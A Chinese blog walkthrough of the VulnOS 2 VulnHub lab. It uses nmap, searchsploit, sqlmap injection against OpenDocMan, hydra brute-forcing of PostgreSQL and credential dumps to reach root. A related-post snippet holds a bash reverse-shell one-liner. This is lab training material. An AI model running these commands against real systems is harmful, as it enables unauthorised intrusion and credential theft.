VulnOS靶场练习详解&安装&必练靶场&渗透靶场练习

最新推荐文章于 2024-07-15 17:39:15 发布
最新推荐文章于 2024-07-15 17:39:15 发布
阅读量896 收藏 18
点赞数 17
文章标签: 服务器 网络 数据库 web安全 网络安全 php linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jockerboss/article/details/136484117
版权
本文介绍了如何在VulnOS2.0靶场中进行虚拟机设置,通过Nmap进行端口扫描,识别SQL注入漏洞并利用Hydra工具爆破PostgreSQL数据库,最后实现root权限提升。
摘要由CSDN通过智能技术生成

 下载链接

VulnOS: 2 ~ VulnHubVulnOS: 2, made by c4b3rw0lf. Download & walkthrough links are available.icon-default.png?t=N7T8https://www.vulnhub.com/entry/vulnos-2,147/

安装

该靶场只能在vxbox中导入,网络模式我选择的桥接

新建虚拟机

将类型改为linux

使用现有虚拟硬盘

解决virtualbox选择桥接方式但没有网卡可选的问题_桥接网卡界面名称没有网卡-CSDN博客icon-default.png?t=N7T8https://blog.csdn.net/m0_46622606/article/details/105883502#:~:text=%E6%9F%A5%E7%9C%8B%E7%BD%91%E7%BB%9C%E8%BF%9E%E6%8E%A5%E5%B1%9E%E6%80%A7%E5%BD%93%E4%B8%AD%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8%E2%80%9CVirtualBox%20Bridged%20Networking%20Driver%E2%80%9D%EF%BC%8C%E5%A6%82%E4%B8%8B%E5%9B%BE%E6%89%80%E7%A4%BA%EF%BC%8C%E5%A6%82%E6%9E%9C%E6%B2%A1%E9%80%89%E4%B8%AD%E5%88%99%E9%80%89%E4%B8%AD%E3%80%82,%E5%A6%82%E6%9E%9C%E6%B2%A1%E6%9C%89%E8%AF%A5%E9%A9%B1%E5%8A%A8%EF%BC%8C%E5%88%99%E7%82%B9%E5%87%BB%E2%80%9C%E5%AE%89%E8%A3%85%E2%80%9D%E2%80%93%E2%80%9C%E6%9C%8D%E5%8A%A1%E2%80%9D%E2%80%93%E2%80%9C%E6%B7%BB%E5%8A%A0%E2%80%9D%E2%80%93%E2%80%9C%E4%BB%8E%E7%A3%81%E7%9B%98%E5%AE%89%E8%A3%85%E2%80%9D%E2%80%93%E2%80%9C%E6%B5%8F%E8%A7%88%E2%80%9D%20%E6%89%BE%E5%88%B0virtualbox%E5%AE%89%E8%A3%85%E7%9B%AE%E5%BD%95%E4%B8%8B%E7%9A%84%E8%BF%99%E4%B8%AA%E8%B7%AF%E5%BE%84%20%E9%80%89%E6%8B%A9VBoxNetLwf.inf%EF%BC%8C%E8%BF%9B%E8%A1%8C%E5%AE%89%E8%A3%85%E3%80%82%20%E5%86%8D%E8%BF%94%E5%9B%9Evirtualbox%E4%B8%AD%E9%80%89%E6%8B%A9%E6%A1%A5%E6%8E%A5%E7%BD%91%E5%8D%A1%EF%BC%8C%E5%8D%B3%E5%8F%AF%E9%80%89%E6%8B%A9%E5%AF%B9%E5%BA%94%E7%9A%84%E7%95%8C%E9%9D%A2%E5%90%8D%E7%A7%B0%E3%80%82

正文:

先用nmap扫描靶机ip

nmap -sn 192.168.1.1/24

获取到靶机ip后,对靶机的端口进行扫描,并把结果输出到VulnOS文件夹下,命名为port方便后续查看

nmap -p- 192.168.1.3 -r -PN -A -oA VulnOS/port

(-p-:对所有端口进行探测

   -PN:用于禁用主机发现。这些参数告诉Nmap不要执行主机存活检测,而是直接扫描指定的目标

    -oA:输出到指定位置

     -r:连续扫描端口,并在扫描过程中随机排序目标端口。这可以帮助减少被网络防御系统检测到的风险。

对端口指纹进行详细探测,并把结果输出到VulnOS文件夹下,命名为server方便后续查看

nmap -p 22,80,6667 192.168.1.3 -sC -sV -r -O --version-all -A -oA VulnOS/server

 (-p:对指定的端口进行探测

   -sV:版本信息

   -sC:默认脚本扫描

    -A:启动Os检测,版本检测,脚本扫描和traceroute

   -O:探测操作系统信息

   --version-all:尽可能多的探测信息

访问80端口

根据页面提示,打开红色字体的链接

并没有什么动西,但是发现作者老六在Documentation页面,留下了黑色字体信息

根据页面提示,我们找到了登录页面以及账号密码 guest/guest

百度搜索OpenDocMan

获取shell

我们在kali中搜索相关漏洞(searchsploit是一个非常实用的网络安全工具,它是Exploit-DB的一个命令行搜索工具。Exploit-DB是一个公开的漏洞数据库,包含了大量的漏洞利用程序)

searchsploit opendocman 1.2.7

发现相关漏洞文件

将该漏洞文件复制到当前目录下

searchsploit opendocman 1.2.7 -m 32075.txt

读取该文件,我们得到了payload

cat 32075.txt

既然他是sql注入,那直接放到sqlmap中进行尝试

python sqlmap.py -u "http://192.168.1.3/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --level 3 --dbs


​python sqlmap.py -u "http://192.168.1.3/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --level 3 -D jabcd0cs --tables

python sqlmap.py -u "http://192.168.1.3/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --level 3 -D jabcd0cs -T odm_user --dump

得到账号webmin  密码webmin1980

进行ssh尝试登录

如果出现该提示,则

vi ~/.ssh/known_hosts

将该文件中对应的靶场ip数据删除即可,如若不知道,则全部删除

ssh webmin@192.168.1.3

登录成功

提权

我们在当前目录下发现一个压缩文件

将其进行解压

tar -xzvf post.tar.gz

到解压文件夹下

cd post

发现是暴力破解工具——hydra源码,并且发现有个这个文件,看来是按时我们爆破该数据库啊(postgresql是一款数据库工具)

我们对该源码进行编译

make

提示我们编译前先运行./configure,然后再进行安装

./configure

make

查看是否成功安装

./hydra

安装成功,但是该靶场没有字典,我们回到kali中,打开http服务,将字典下载过来

在kali的 

/usr/share/wordlists/metasploit/

  路径下有  postgres_default_user.txt 以及 postgres_default_pass.txt字典文件

我们在当前路径下打开http服务

python3 -m http.server 8888

回到靶机shell中,回到初始目录

将两个字典下载过来

wget http://192.168.1.35:8888/postgres_default_user.txt
​wget http://192.168.1.35:8888/postgres_default_pass.txt

并将文件重新命名,方便使用(名字太长了)

mv postgres_default_pass.txt pass.txt
mv postgres_default_user.txt user.txt

运行post目录下hydra工具

./post/hydra

可以看到该工具可以直接爆破该数据库

利用字典进行爆破尝试

./post/hydra -L user.txt -P pass.txt postgres://127.0.0.1

爆破出该数据库的账号密码

postgres:postgres

对该数据库进行登录

psql -h 127.0.0.1 -U postgres

登录成功,(postgresql数据库可以看看这篇文档5432,5433 - 渗透测试 Postgresql - HackTricks

\l #查看所有数据库

\c #指定数据库
\c system

\d #列出表

查看users表内容

select * from users;

如果出现敲入命令没反应,就在后面加上分号,报错后再次进行输入(别忘了分号!)

ok

我们获取到了另一个账号密码

vulnosadmin:c4nuh4ckm3tw1c3

再次尝试登录

ssh vulnosadmin@192.168.1.3

我们发现在该用户目录下有个blend文件

经过查询,该文件为3D 建模应用程序 Blender 的原生 3D 图形文件格式

我们将该文件下载到当前目录下

scp vulnosadmin@192.168.1.3:~/r00t.blend ./

安装blend进行查看该文件

我们隐藏掉图形后,发现在该文件中央藏着一个密码 

ab12fg//drg

我们回到靶场shell

su root

输入密码

ab12fg//drg

登陆root账号成功!

Brown1.
关注
  • 17
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
vulnhub VulnOS: 2
箭雨镜屋
12-05 2538
本文思路:nmap端口扫描-->访问网站搜集信息-->利用OpenDocMan v1.2.7的sql注入漏洞获取webmin用户的密码-->webmin用户ssh登录搜集信息-->利用内核版本漏洞提权(或者 爆破postgresql用户名密码-->postgresql中获得vulnosadmin的密码-->通过vulnosadmin用户目录下的r00t.blend文件获得root用户密码)
VulnHub靶机-VulnOs-2
Slow_的博客
02-24 626
VulnHub靶机-VulnOs-2 下载地址:https://www.vulnhub.com/entry/vulnos-2,147/ 下载靶机后在VirtualBox下打开,网卡配置为桥接 任务:提权并获取flag 攻击机:kali linux 192.168.8.108 靶机:192.168.8.107 文章目录VulnHub靶机-VulnOs-2一、信息搜集一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 一、信息搜集 首先nmap探测存活靶机 命令:nmap -sP 192.168.8
Vulnosv2 靶机训练
weixin_43999483的博客
03-02 224
参考博客传送门 关键点:web系统可能在msf中保留有漏洞记录,找到相对应的版本攻击点进行攻击 searchsploit OpenDocMan 1.2.7 一般存放目录都放在 /usr/share/exploitdb下面 获得低权限用户后 可以考虑Linux内核提权 searchsploit Linux 3.13.0 搭建一个文件服务器 python -m SimpleHTTPServer 6666 下载 wget http://xxx.xxx.xxx.xxx 如果是c类型文件,需要gcc编译 找
Vulnhub靶机 VULNOS: 2 writeup
xingjinhao123的博客
02-10 3038
下载地址:https://www.vulnhub.com/entry/vulnos-2,147/ 信息搜集 获取IP地址 扫描端口 80端口 点击website跳转到/jabc 在 jabc/?q=node/7 页面看起来啥也没有,但是Ctrl+A全选之后看到提示还有一个目录 /jabcd0cs/ 访问/jabcd0cs/ 在/jabcd0cs/发现CMS的版本,使用searchsploit查询 这里看到了pyload http://[host]/ajax_udf.php?q=1&amp
Vulnhub 靶机 VulnOSv2 write up opendocman cms 32075 sql注入 账号密码 ssh连接 37292.c 脏牛提权
YouthBelief的博客
12-05 2274
VulnOSv2 write up0x00 环境搭建0x01 信息收集0x02 漏洞挖掘web思路步骤一:枚举目录+主页挖掘步骤二:OpenDocMan v1.2.7 cms利用步骤三:尝试利用账号面ssh连接webmin0x03 提权步骤四:内核漏洞提权0x04 总结 0x00 环境搭建 VritualBox配置网络为 host-only VMware中kali加入 host-only 为Virtual Box的网卡 开启虚拟机报错 usb 2.0 什么的问题 修改usb设备为1.0 0x01 信息
渗透测试经典靶场学习-DVWA练习.
07-02
渗透测试经典靶场学习-DVWA练习.
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
dvwa靶场,可以用于练习web渗透技术
05-19
dvwa靶场压缩包
网络安全渗透)DVWA靶场安装所需配置
07-10
这个是DVWA网络安全渗透靶场,这个是压缩包,此为靶场,不要看错了,学习网络安全或者是其他的渗透知识。靶场是必备的,一个好的靶场对学习知识起到了十分重要的作用,DVWA靶场网络安全或者是渗透中必备的东西,...
sqli-labs靶场练习wp的配图.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 3572
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
kali linux 下搭建 Vulhub 靶场(图文详解
m0_63521991的博客
08-08 3889
【在kali linux 下搭建vulhub靶场及其依赖】关于kali、docker、vulhub的简介,靶场的开启、关闭、注意事项
Vulnhub-靶机-VulnOSv2
qq_43264813的博客
03-01 460
Vulnhub—靶机—Kioptrix: Level 1 (#1) 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 文章目录Vulnhub—靶机—Kioptrix: Level 1 (#1)一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.43.0/24 【步骤二】对目标靶机进行全端口扫描: 【命令】nmap -n -sC -sV -p- 192.1
带妹玩转Vulnhub【二】
BadRer的博客
09-27 1077
前言 今天还是没有妹子主动来找我,一怒之下再写一篇,以此祭天!哼!QAQ 带妹是不可能带妹的,这辈子都不可能带妹的
No.14-VulnHub-VulnOS: 2-Walkthrough渗透学习
qq_34801745的博客
01-11 1135
** VulnHub-VulnOS: 2-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/vulnos-2,147/ 靶机难度:中级(CTF) 靶机发布日期:2016年5月17日 靶机描述:VulnOS是打包为虚拟映像的一系列易受攻击的操作系统,以增强渗透测试技能 这是版本2- 体积更小,更少混乱! 由于时间并不总是在我身边,因此花了很长时间创建...
VulnHub-VulnOS: 2-靶机渗透学习
嗯嗯呐的博客
12-15 945
靶机地址:https://www.vulnhub.com/entry/vulnos-2,147/ 靶机难度:初级(CTF) 靶机描述:VulnOS是打包为虚拟映像的一系列易受攻击的操作系统,以增强渗透测试技能 这是版本2- 体积更小,更少混乱! 由于时间并不总是在我身边,因此花了很长时间创建另一个VulnOS。但是我喜欢创建它们。该映像是使用VBOX构建的。解压缩文件并将其添加到虚拟化软件中。 目标:得到root权限&找到flag.txt 作者:嗯嗯呐 信息收集 nmap 扫描靶机IP nmap
UWA学堂上新|服务器AOI(Area Of Interest)算法和功能实现
UWA—简单优化,优化简单!
07-12 379
基于.NetCore开发MMORPG分布式游戏服务器系列篇6
服务器】端口映射
2301_82023330的博客
07-11 1033
端口映射(Port Mapping)是一种网络技术,通过将一个端口的数据流重定向到另一个端口,允许外部设备访问内部网络中的特定服务。主要有本地端口映射、远程端口映射和动态端口映射三种类型。应用场景包括远程访问内部服务、穿透防火墙、提高安全性以及负载均衡和代理。本文详细介绍了端口映射的概念、类型、应用场景,并通过SSH命令示例展示如何在本地计算机上实现端口映射,以访问远程服务器上的服务。
什么样的服务器是合乎直销网站标准
最新发布
2301_78491269的博客
07-15 136
对于我们投资较少、刚刚起步的做网站直销公司来说,当然没有条件也没有必要来投资数千万、甚至数亿元来建立自己的数据中心,我们要做的就是选择一个合适的服务器租用商,租用他们优质的服务器,来保证发挥出该服务器的最大作用。工业设计包括了最基础的模块化和免螺丝设计,可以让运维人员实现免工具的快速拆装,以及可以有效防止和避免误操作的防呆设计等细节,此外机箱内的风道设计、散热效率、风扇与电源的配合、降噪与防震设计等等,都可以反映出厂家在相关技术及工业设计方面的实力高低。做网站直销选择租用服务器需要注意的几点要素。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值